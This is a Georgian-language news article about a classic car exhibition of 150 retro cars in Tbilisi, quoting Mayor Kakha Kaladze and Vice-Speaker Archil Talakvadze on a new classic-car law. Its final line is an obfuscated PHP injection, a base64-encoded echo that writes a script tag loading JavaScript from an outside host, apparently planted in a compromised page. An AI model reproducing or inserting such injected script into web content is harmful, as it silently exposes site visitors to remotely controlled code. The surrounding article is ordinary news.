celsiusi
ავერსი საქკაბელი

თბილისის მერიის მხარდაჭერით, პირველი რესპუბლიკის მოედანზე კლასიკური ავტომობილების გამოფენა იმართება. ღონისძიებაზე 150 რეტრო მანქანაა წარმოდგენილი.

ღონისძიებას შვილთან ერთად დაესწრო თბილისის მერი კახა კალაძე. ღონისძიებაზე ასევე იმყოფებოდნენ პარლამენტის ვიცე-სპიკერი არჩილ თალაკვაძე და თბილისის ვიცე-მერი ირაკლი ხმალაძე.

კახა კალაძის თქმით, ბოლო წლებში კლასიკური ავტომობილების შესახებ არაერთი საკანონმდებლო ინიციატივა მომზადდა, რომლის ერთ-ერთი ავტორი და აღნიშნული ღონისძიების თანაორგანიზატორი არჩილ თალაკვაძეა.

„საქართველოში ძალიან უყვართ ავტომობილები, განსაკუთრებით კი კლასიკური ავტომობილები. დედაქალაქის მერია მხარს უჭერს აღნიშნულ პროექტს. თუ გადავხედავთ სტატისტიკას, საქართველოში ბოლო წლების განმავლობაში ძალიან გაიზარდა ისტორიული ავტომობილების რაოდენობა. დღევანდელი ღონისძიებაც ამაზე მეტყველებს. დღეისთვის 250 ადამიანი არის გაწევრიანებული აღნიშნულ კლუბში. ჩვენი მხრივ, ხელს შევუწყობთ ასეთი პროექტების განხორციელებას, რომ ამ მიმართულებით მეტი ადამიანი იყოს დაინტერესებული“, – განაცხადა კახა კალაძემ.

არჩილ თალაკვაძის თქმით, პარლამენტის მიერ მიღებული კანონით კლასიკური ავტომობილების სფერო დარეგულირდა.

„საქართველოს პარლამენტმა წინა სესიაზე მიიღო სპეციალური კანონი კლასიკური ავტომობილების შესახებ, რითიც პრაქტიკულად შევქმენით საკანონმდებლო ჩარჩო ამ კლასისა და ამ ასაკის ავტომობილებისთვის. მთლიანად არის ეს სფერო დარეგულირებული. ეს ხელს შეუწყობს როგორც ეკონომიკას, ისე ტურიზმს და, რაც მთავარია, კლასიკურ ავტომობილებთან დაკავშირებული კულტურის ჩვენს ქვეყანაშიც ჩამოყალიბებას. დასავლეთ ევროპაში, ამერიკის შეერთებულ შტატებში უკვე ძალიან პოპულარულია და კარგია, რომ საქართველოშიც მკვიდრდება ეს კულტურა“, – აღნიშნა არჩილ თალაკვაძემ.

245
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");